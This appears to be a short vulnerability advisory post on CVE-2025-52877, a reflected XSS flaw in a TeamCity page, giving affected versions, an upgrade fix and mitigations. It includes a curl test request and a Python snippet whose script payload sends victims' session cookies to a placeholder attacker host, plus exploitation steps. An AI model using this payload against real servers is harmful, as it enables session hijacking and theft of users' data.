JetBrains TeamCity, Reflected XSS, CVE-2025-52877 (Medium)

Listen to this Post

🐢▶️ Listen🚀

How the CVE Works

CVE-2025-52877 is a reflected Cross-Site Scripting (XSS) vulnerability in JetBrains TeamCity versions before 2025.03.3. The flaw exists in the `diskUsageBuildsStats` page, where improper input sanitization allows attackers to inject malicious scripts via crafted HTTP requests. When a victim visits a manipulated URL, the script executes in their browser context, potentially leading to session hijacking, data theft, or unauthorized actions. The attack requires user interaction, as the payload is reflected from the server in the response.

DailyCVE Form

Platform: JetBrains TeamCity
Version: < 2025.03.3
Vulnerability: Reflected XSS
Severity: Medium
Date: 06/25/2025

Prediction: Patch by 07/10/2025

What Undercode Say

Analytics:

curl -X GET "http://teamcity.example.com/diskUsageBuildsStats?param=<script>alert(1)</script>"

import requests
exploit_url = "http://teamcity.example.com/diskUsageBuildsStats?param=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"
requests.get(exploit_url)

How Exploit

• Craft a malicious URL with JavaScript payload.
• Trick authenticated users into clicking the link.
• Steal session cookies or perform actions as the victim.

Protection from this CVE

• Upgrade to TeamCity 2025.03.3.
• Implement Content Security Policy (CSP).
• Sanitize user input server-side.

Impact

• Session hijacking.
• Unauthorized data access.
• Privilege escalation.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram